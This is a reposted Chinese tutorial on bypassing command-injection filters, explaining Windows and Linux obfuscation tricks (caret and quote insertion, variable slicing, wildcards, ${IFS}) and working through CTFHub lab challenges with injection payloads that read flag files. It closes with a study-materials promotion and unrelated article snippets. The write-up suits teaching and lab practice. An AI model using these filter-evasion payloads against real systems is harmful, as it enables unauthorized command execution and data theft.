【RCE剖析】从0到1讲解RCE漏洞绕过,Windows与Linux的RCE漏洞绕过方式总结

前言

本文将讲解windows/linux的常见命令以及命令执行漏洞绕过方式,靶场环境为ctfhub,分别有命令注入、cat过滤、空格过滤、过滤目录分隔符、运算符过滤,这几种绕过方式

Windows

我们在windows命令行中执行命令的时候,是不区分大小写

C:\>WHOAMI yv\administrator

在命令行中可以有无数个"

C:\>wh""""oami yv\administrator C:\>wh""""""""""""""""""""""""""""""oami yv\administrator

不能有两个连续的^

C:\>whoa^mi yv\administrator C:\>whoam^^i'whoam^i'不是内部或外部命令,也不是可运行的程序 或批处理文件。 C:\>who^a^m^i yv\administrator

在命令中如果"^之前,此时"数量必须为偶数

C:\>who""a^mi yv\administrator C:\>who"a^mi 'who"a^mi' 不是内部或外部命令,也不是可运行的程序 或批处理文件。

在命令中"^之后,且带有参数,则也需要带有偶数

C:\>n^et" user 'net"user' 不是内部或外部命令,也不是可运行的程序 或批处理文件。 C:\>n^et""user\\YV 的用户帐户 ------------------------------------------------------------------------------- Administrator DefaultAccount Guest mysql WDAGUtilityAccount www 命令成功完成。

也可以使用()对命令进行包裹

C:\>(whoami)yv\administrator C:\>(n^et""user)\\YV 的用户帐户 ------------------------------------------------------------------------------- Administrator DefaultAccount Guest mysql WDAGUtilityAccount www 命令成功完成。

()的数量不设上限

C:\>(((whoami))) yv\administrator

使用变量

简单拼接

%%局部分开每个变量

C:\>setcmd1=who C:\>setcmd2=am C:\>setcmd3=i C:\>%cmd1%%cmd2%%cmd3% yv\administrator

变量拼接方式二

C:\>setcmd1=who C:\>setcmd3=i C:\>%cmd1%am%cmd3% yv\administrator

变量拼接方式三

C:\>setcmd1=wh"""o C:\>setcmd3=i""" C:\>%cmd1%am%cmd3% yv\administrator

变量拼接方式四^

C:\>setcmd1=wh""""o # 这里需要偶数,因为在变量拼接结果中有 ^ C:\>set cmd3=i""" # 后面正常多少个 "都行 C:\>%cmd1%a^m%cmd3% yv\administrator

含有参数的命令,net user

C:\>setcmd1=s""er C:\>setcmd2=t u C:\>setcmd3=n^e C:\>%cmd3%%cmd2%%cmd1%\\YV 的用户帐户 ------------------------------------------------------------------------------- Administrator DefaultAccount Guest mysql WDAGUtilityAccount www 命令成功完成。

一次性执行多条命令

C:\>cmd /C"set cmd1=s""ser&&setcmd2=t u&&setcmd3=n^e&&%cmd3%%cmd2%%cmd1%"\\YV 的用户帐户 ------------------------------------------------------------------------------- Administrator DefaultAccount Guest mysql WDAGUtilityAccount www 命令成功完成。

Windows环境变量切分

先设置一个变量

C:\>setcmd=whoami C:\>%cmd% yv\administrator

这个0,1表示的数组切片,代表前后切片的索引

C:\>setcmd=whoami C:\>echo %cmd:~0,1% w C:\>echo %cmd:~0,4% whoa

也可以为负数,负数表示从右边开始数第几个

C:\>setcmd=whoami C:\>echo %cmd:~-4,4% oami C:\>echo %cmd:~-6,4% whoa

当然也能直接向外部写一个php一句话木马

image-20240812113353901

检查是否存在

for循环执行命令

C:\>cmd /V:ON /C"set kpx=awlh2im,xiaoyu&& for %G in (1,3,-3,0,6,5) do set lq=!lq!!kpx:~%G,1!&& if %G==5 !lq:~4!"C:\>setlq=!lq!!kpx:~1,1!&&if1==5!lq:~4!C:\>setlq=!lq!!kpx:~3,1!&&if3==5!lq:~4!C:\>setlq=!lq!!kpx:~-3,1!&&if-3==5!lq:~4!C:\>setlq=!lq!!kpx:~0,1!&&if0==5!lq:~4!C:\>setlq=!lq!!kpx:~6,1!&&if6==5!lq:~4!C:\>setlq=!lq!!kpx:~5,1!&&if5==5!lq:~4!yv\administrator

Linux

linux中是区分大小写的

┌──(root㉿251ebe86465a)-[/]└─# LSLS:commandnot found ┌──(root㉿251ebe86465a)-[/]└─# LsLs:commandnot found

运算符;表示连续指令,即使前面那条命令报错,后面也会接着执行

┌──(root㉿251ebe86465a)-[/] └─# LS;whoami LS: command not found root

&用于后台执行命令,这个可能看不出来

┌──(root㉿251ebe86465a)-[/]└─# ls&wHoami[1]59archive-key.asc boot etc lib lib64 mnt proc run srv tmp var bin dev home lib32 media opt root sbin sys usr Command'Whoami'not found, did you mean:command'whoami'from deb coreutils Try:aptinstall<deb name>[1]+ Donels--color=auto

我们使用ping 127.0.0.1 & whoami,这条命令会将ping放在后台执行,这个时候你没有设置ping的次数,就会一直执行下去,停止不了,而whoami已经执行完毕了。

┌──(root㉿kali)-[/usr/local]└─# ping 127.0.0.1& whoami[1]4508root PING127.0.0.1(127.0.0.1)56(84)bytes of data.64bytes from127.0.0.1:icmp_seq=1ttl=64time=5.80ms ┌──(root㉿kali)-[/usr/local]└─# 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.593 ms64bytes from127.0.0.1:icmp_seq=3ttl=64time=0.049ms64bytes from127.0.0.1:icmp_seq=4ttl=64time=0.044ms64bytes from127.0.0.1:icmp_seq=5ttl=64time=0.058ms64bytes from127.0.0.1:icmp_seq=6ttl=64time=0.045ms --------之后将会一直运行下去,也停止不了。。。。

&&连接两个指令的时候,要保证命令两个命令都能正常执行,否则一个错,就执行不了了

┌──(root㉿251ebe86465a)-[/]└─# ls&&whoamiarchive-key.asc boot etc lib lib64 mnt proc run srv tmp var bin dev home lib32 media opt root sbin sys usr root ┌──(root㉿251ebe86465a)-[/]└─# LS&&whoamiLS:commandnot found

|管道符:用于将一个命令的输出作为另一个命令的输入。它允许两个或多个命令之间传递数据。

例如,我获取这个/data路径的下的所有包含boo的文件

┌──(root㉿251ebe86465a)-[/data] └─# ls | grep '*boo*' boot

||逻辑运算符:如果||左边的命令执行失败(返回非零退出状态),那么||右边的命令将会被执行。执行成功一个命令后,后面的苏哦有命令都不会执行。

┌──(root㉿251ebe86465a)-[/]└─# ip addr || wHoami || ls1: lo:<LOOPBACK,UP,LOWER_UP>mtu65536qdisc noqueue state UNKNOWN group default qlen1000link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet127.0.0.1/8 scopehostlo valid_lft forever preferred_lft forever inet6 ::1/128 scopehostvalid_lft forever preferred_lft forever5: eth0@if6:<BROADCAST,MULTICAST,UP,LOWER_UP>mtu1500qdisc noqueue state UP group default link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid0inet172.17.0.2/16 brd172.17.255.255 scope global eth0 valid_lft forever preferred_lft forever

转义字符\

┌──(root㉿251ebe86465a)-[/] └─# who\ami root

''()$,``

┌──(root㉿251ebe86465a)-[/] └─# who''ami root ┌──(root㉿251ebe86465a)-[/] └─# (whoami) root ┌──(root㉿251ebe86465a)-[/] └─# (who''ami) root ┌──(root㉿251ebe86465a)-[/] └─# `(echo whoami)` root ┌──(root㉿251ebe86465a)-[/] └─# $(echo whoami) root

命令引用

┌──(root㉿kali)-[/data] └─# t=l;j=s;$t$j #相当于执行了 ls 谷歌插件 GitHack miku

linux特有变量

$1$*$@$n这个n表示除0以外的任意数字,都可以作为系统命令绕过的方式

┌──(root㉿kali)-[/data] └─# who$2ami root ┌──(root㉿kali)-[/data] └─# who$4ami root ┌──(root㉿kali)-[/data] └─# who$*ami root ┌──(root㉿kali)-[/data] └─# who$@ami root ┌──(root㉿kali)-[/data] └─# who$0ami who-zshami:未找到命令

linux通配符

我们以执行whoami这个命令来进行测试

┌──(root㉿kali)-[/etc/docker] └─# whereis whoami whoami: /usr/bin/whoami /usr/share/man/man1/whoami.1.gz ┌──(root㉿kali)-[/etc/docker] └─# /usr/bin/whoam* root ┌──(root㉿kali)-[/etc/docker] └─# /usr/bin/whoam? root ┌──(root㉿kali)-[/etc/docker] └─# /usr/bin/wh?am? root ┌──(root㉿kali)-[/etc/docker] └─# /usr/bin/????mi root ┌──(root㉿kali)-[/etc/docker] └─# /u?r/b?n/????mi root ┌──(root㉿kali)-[/etc/docker] └─# /*/b?n/????mi root

Linux中命令中的命令

虽然会报错,但是命令也会正常执行

┌──(root㉿kali)-[/etc/docker] └─# `666666` 666666:未找到命令 ┌──(root㉿kali)-[/etc/docker] └─# 666666`whoami`6666 666666root6666:未找到命令 ┌──(root㉿kali)-[/etc/docker] └─# `6666`whoami`6666` 6666:未找到命令 6666:未找到命令 root ┌──(root㉿kali)-[/etc/docker] └─# 6666`whoami`6666 6666root6666:未找到命令 ┌──(root㉿kali)-[/etc/docker] └─# w`sfdawfewa`ho`sajfdkljas`am`sdjflk123`i sfdawfewa:未找到命令 sajfdkljas:未找到命令 sdjflk123:未找到命令 root ┌──(root㉿kali)-[/etc/docker] └─# wh${sdf}oam${ddkjdld}i root ┌──(root㉿kali)-[/etc/docker] └─# wh${sdf242341}oam${ddkjdld234232}i root

linux环境变量切割

查看环境变量

┌──(root㉿251ebe86465a)-[/] └─# echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

查看环境变量的长度

┌──(root㉿251ebe86465a)-[/] └─# echo ${#PATH} 60

分割环境变量

┌──(root㉿kali)-[/etc/docker] └─# echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/root/.dotnet/tools ┌──(root㉿kali)-[/usr/local] └─# echo ${PATH:0:10} /usr/local ┌──(root㉿kali)-[/usr/local] └─# echo ${PATH:0:1} /

靶场练习CTFHUB

使用&&符号,没有获取到想要的结果,因为&&在前一个命令没有执行结束的时候,是不会执行后面的命令的。

当然还有种思路就是指定次数,使用-c参数,这里是没有效果的

┌──(root㉿kali)-[~] └─# ping -c 2 127.0.0.1 PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.489 ms 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.106 ms --- 127.0.0.1 ping statistics --- 2 packets transmitted, 2 received, 0% packet loss, time 1004ms rtt min/avg/max/mdev = 0.106/0.297/0.489/0.191 ms

;绕过

┌──(root㉿kali)-[~] └─# ping -c 2 127.0.0.1;whoami PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.558 ms 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.047 ms --- 127.0.0.1 ping statistics --- 2 packets transmitted, 2 received, 0% packet loss, time 1008ms rtt min/avg/max/mdev = 0.047/0.302/0.558/0.255 ms root

使用&也可以得到结果,通过将ping命令放到后台执行,后面的结果也会执行

[1]=>/sys/devices/platform/serial8250/tty/ttyS2/flags payload:127.0.0.1&cat/sys/devices/platform/serial8250/tty/ttyS2/flags[2]=>/sys/devices/platform/serial8250/tty/ttyS0/flags payload:127.0.0.1&cat/sys/devices/platform/serial8250/tty/ttyS0/flags[3]=>/sys/devices/platform/serial8250/tty/ttyS3/flags payload:127.0.0.1&cat/sys/devices/platform/serial8250/tty/ttyS3/flags[4]=>/sys/devices/platform/serial8250/tty/ttyS1/flags payload:127.0.0.1&cat/sys/devices/platform/serial8250/tty/ttyS1/flags[5]=>/sys/devices/virtual/net/tunl0/flags payload:127.0.0.1&cat/sys/devices/virtual/net/tunl0/flags[6]=>/sys/devices/virtual/net/lo/flags payload:127.0.0.1&cat/sys/devices/virtual/net/lo/flags

这些payload都给你们试过了,没有flag

不断执行命令,找到这个web目录中有一个数字.php查看即可

得知payload

127.0.0.1 & cat /var/www/html/17165225371506.php

查看源码

过滤cat

题目:过滤了cat命令之后,你还有什么方法能读到 Flag?

查看目录,他换了个名字

没有cat那么在linux中还有这样几个命令

tac命令是cat命令的反向操作,它会按行读取文件内容,但会以相反的顺序输出。这意味着文件的最后一行将首先显示,而第一行将最后显示。

127.0.0.1 &tac /var/www/html/flag_9902871730290.php

less命令与more命令类似,也是用于分页显示文本文件的内容,但less提供了更多的导航选项,如向前翻页、向后翻页、搜索文本等。

127.0.0.1 &less 5 /var/www/html/flag_9902871730290.php

head命令用于显示文件的开头部分,默认显示前10行,但可以通过选项指定显示的行数。

127.0.0.1 &head 5 /var/www/html/flag_9902871730290.php

tail命令用于显示文件的末尾部分,默认显示最后10行,与head命令相对应。它还可以用于实时跟踪文件的新增内容。

127.0.0.1 &tail 5 /var/www/html/flag_9902871730290.php

nl命令与cat -b命令相似,用于显示文件内容并在每行前加上行号,但nl提供了更多的格式化选项。

127.0.0.1 & nl /var/www/html/flag_9902871730290.php

awk是一个强大的文本处理工具,虽然它主要用于模式扫描和处理语言,但在某些情况下,可以使用awk命令以类似于cat的方式显示文件内容,同时添加额外的文本处理功能。

127.0.0.1 & awk '{print}' /var/www/html/flag_9902871730290.php

more命令用于分页显示文本文件的内容,用户可以通过按空格键翻页,按b键回退,按q键退出。虽然它主要用于分页查看,但在逐页查看文件内容时,与cat命令直接显示整个文件内容的方式形成对比。

127.0.0.1 & more /var/www/html/flag_9902871730290.php

过滤空格

分析源码,使用preg_match_all函数检查变量$ip中是否包含空格。

空格的绕过方式一般有(针对于本题来讲)

1、${IFS}代替空格

127.0.0.1&ls${IFS}/var/www/html/

2、%09相当于tab

127.0.0.1&ls%09/var/www/html/

3、大括号{}

127.0.0.1&{ls,/var/www/html/}

4、重定向字符><>

举例

┌──(root㉿kali)-[/data] └─# ping -c 1 127.0.0.1;ls<>-l PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.701 ms --- 127.0.0.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.701/0.701/0.701/0.000 ms 谷歌插件 GitHack -l miku

payload:127.0.0.1&ls<>/var/www/html/

经过测试,上面四种仅有${IFS}成功

完整payload

127.0.0.1&cat${IFS}/var/www/html/flag_172742853821990.php

过滤目录分隔符

题目:这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗?

直接使用ls查看目录,没有东西

试试%2F

127.0.0.1 & ls %2Fvar%2Fwww%2Fhtml

那我们直接ls

使用cd和;进行多行命令执行即可,一级目录一级目录的cd即可

127.0.0.1;cd flag_is_here;cat flag_31328570616525.php

过滤运算符

题目:过滤了几个运算符, 要怎么绕过呢?

分析源码,过滤了运算符,但是也没完全过滤,少了个;

;即可

127.0.0.1;cat flag_5393398119154.php

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1195254.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

cabview.dll文件丢失找不到问题 免费下载方法分享

在使用电脑系统时经常会出现丢失找不到某些文件的情况&#xff0c;由于很多常用软件都是采用 Microsoft Visual Studio 编写的&#xff0c;所以这类软件的运行需要依赖微软Visual C运行库&#xff0c;比如像 QQ、迅雷、Adobe 软件等等&#xff0c;如果没有安装VC运行库或者安装…

【专家亲授】:dify集成企业微信群聊机器人的最佳实践(附完整代码示例)

第一章&#xff1a;dify集成企业微信群聊机器人的核心价值 将 Dify 与企业微信群聊机器人集成&#xff0c;能够显著提升团队协作效率与自动化水平。通过该集成&#xff0c;用户可以在日常沟通中直接调用 AI 能力&#xff0c;实现智能问答、任务提醒、数据查询等场景的无缝对接。…

Claude Desktop自定义MCP Server路径不生效?(深度排查指南)

第一章&#xff1a;Claude Desktop 无法识别自定义 mcp server 路径 当使用 Claude Desktop 客户端连接自定义 MCP&#xff08;Model Control Plane&#xff09;服务器时&#xff0c;部分用户反馈客户端无法正确识别手动配置的服务器路径。该问题通常出现在开发或测试环境中&am…

IT内卷时代,普通Java程序员面试前如何查漏补缺?

现在互联网大环境不好&#xff0c;互联网公司纷纷裁员并缩减HC&#xff0c;更多程序员去竞争更少的就业岗位&#xff0c;整的IT行业越来越卷。身为Java程序员的我们就更不用说了&#xff0c;上班8小时需要做好本职工作&#xff0c;下班后还要不断提升技能、技术栈&#xff0c;才…

渗透测试怎么做?看完这个我也学会了!一文带你零基础黑客渗透入门到精通!

01、信息收集 1、域名、IP、端口 域名信息查询&#xff1a;信息可用于后续渗透 IP信息查询&#xff1a;确认域名对应IP&#xff0c;确认IP是否真实&#xff0c;确认通信是否正常 端口信息查询&#xff1a;NMap扫描&#xff0c;确认开放端口 发现&#xff1a;一共开放两个…

Paraformer-large能否替代商业ASR?成本效益全面对比

Paraformer-large能否替代商业ASR&#xff1f;成本效益全面对比 1. 引言&#xff1a;我们为什么需要离线语音识别&#xff1f; 你有没有遇到过这种情况&#xff1a;手头有一段两小时的会议录音&#xff0c;想转成文字整理纪要&#xff0c;但市面上的在线语音识别工具要么按分…

CallButtons.dll文件丢失找不到问题 免费下载方法分享

在使用电脑系统时经常会出现丢失找不到某些文件的情况&#xff0c;由于很多常用软件都是采用 Microsoft Visual Studio 编写的&#xff0c;所以这类软件的运行需要依赖微软Visual C运行库&#xff0c;比如像 QQ、迅雷、Adobe 软件等等&#xff0c;如果没有安装VC运行库或者安装…

Java程序员如何深入学习JVM底层原理?

Java程序员工作多年之后&#xff0c;遇到的项目会越来越复杂&#xff0c;遇到的问题也会越来越复杂&#xff1a;各种古怪的内存溢出&#xff0c;死锁&#xff0c;应用崩溃……这些都会迫使你不得不去深入学习JVM底层原理那么应该如何学JVMJVM知识庞杂&#xff0c;没有某一份资料…

cv_unet_image-matting实战案例:电商平台商品图自动化流程

cv_unet_image-matting实战案例&#xff1a;电商平台商品图自动化流程 1. 为什么电商商家需要这套抠图方案&#xff1f; 你有没有遇到过这样的情况&#xff1a;每天要上架20款新品&#xff0c;每张商品图都要手动抠图换背景&#xff1f;设计师忙不过来&#xff0c;外包成本高…

CallButtons.ProxyStub.dll文件丢失找不到 免费下载方法分享

在使用电脑系统时经常会出现丢失找不到某些文件的情况&#xff0c;由于很多常用软件都是采用 Microsoft Visual Studio 编写的&#xff0c;所以这类软件的运行需要依赖微软Visual C运行库&#xff0c;比如像 QQ、迅雷、Adobe 软件等等&#xff0c;如果没有安装VC运行库或者安装…

【MCP服务器资源管理终极指南】:动态定义resources的5大核心技巧揭秘

第一章&#xff1a;MCP服务器动态资源管理的核心概念 在现代云计算架构中&#xff0c;MCP&#xff08;Multi-tenant Control Plane&#xff09;服务器的动态资源管理是保障系统高效性与稳定性的关键机制。其核心在于根据实时负载变化&#xff0c;智能分配计算、存储与网络资源&…

揭秘dify与企业微信机器人对接全流程:99%的人都忽略的关键细节

第一章&#xff1a;Dify与企业微信机器人对接的核心价值 将Dify的人工智能能力与企业微信机器人集成&#xff0c;能够显著提升企业内部的信息处理效率与自动化水平。通过该集成&#xff0c;员工可在熟悉的沟通环境中直接与AI交互&#xff0c;实现任务查询、数据汇总、流程触发等…

GPEN人脸增强安全性如何?隐私保护机制分析案例

GPEN人脸增强安全性如何&#xff1f;隐私保护机制分析案例 GPEN人像修复增强模型镜像 本镜像基于 GPEN人像修复增强模型 构建&#xff0c;预装了完整的深度学习开发环境&#xff0c;集成了推理及评估所需的所有依赖&#xff0c;开箱即用。 1. 镜像环境说明 组件版本核心框架…

如何调用SenseVoiceSmall API?Python代码实例详细说明

如何调用SenseVoiceSmall API&#xff1f;Python代码实例详细说明 1. 什么是 SenseVoiceSmall&#xff1f; 你有没有遇到过这样的问题&#xff1a;一段语音里不仅有说话内容&#xff0c;还藏着情绪、背景音乐甚至掌声笑声&#xff0c;但普通语音识别只能告诉你“说了什么”&a…

为什么你的MCP Server路径总被忽略?Claude Desktop配置避坑指南

第一章&#xff1a;Claude Desktop 无法识别自定义 mcp server 路径 当在本地开发环境中运行自定义的 MCP&#xff08;Model Control Plane&#xff09;服务时&#xff0c;Claude Desktop 客户端可能无法正确识别用户指定的服务地址。该问题通常表现为客户端仍尝试连接默认远程…

【Claude Desktop疑难杂症】:自定义MCP Server路径识别失败的5大原因及解决方案

第一章&#xff1a;Claude Desktop自定义MCP Server路径识别失败的典型现象与影响评估 在使用 Claude Desktop 配置自定义 MCP&#xff08;Model Control Plane&#xff09;Server 时&#xff0c;用户常遇到路径识别失败的问题。该问题表现为客户端无法正确解析或访问指定的本地…

2026年上海精密橡胶模具设计制造公司排名

2026年上海精密橡胶模具设计制造公司排名一、食品行业欧美企业的模具痛点:找对“适配性”比什么都重要对于上海的欧美食品企业来说,环保无毒的硅胶密封件是产品安全的核心防线,但要做出符合FDA标准的密封件,首先得…

2026国际物流哪家性价比高?综合服务与成本优势解析

在全球化贸易持续深化的背景下,国际物流作为连接供应链各环节的关键纽带,其服务质量与成本控制直接影响企业的运营效率。性价比高的国际物流服务通常具备覆盖广、流程优、响应快等特点,需综合考量服务范围、专业能力…

新手入门必看:cv_unet_image-matting WebUI界面功能详解

新手入门必看&#xff1a;cv_unet_image-matting WebUI界面功能详解 1. 引言&#xff1a;为什么你需要这款智能抠图工具&#xff1f; 你是不是也遇到过这些情况&#xff1a;想做个电商主图&#xff0c;但模特背景太杂乱&#xff1b;想换个证件照底色&#xff0c;却不会用PS&a…

Live Avatar边缘计算尝试:Jetson设备运行可行性

Live Avatar边缘计算尝试&#xff1a;Jetson设备运行可行性 1. Live Avatar阿里联合高校开源的数字人模型 Live Avatar是由阿里巴巴与多所高校联合推出的开源数字人项目&#xff0c;旨在通过AI技术实现高质量、实时驱动的虚拟人物生成。该模型基于14B参数规模的DiT&#xff0…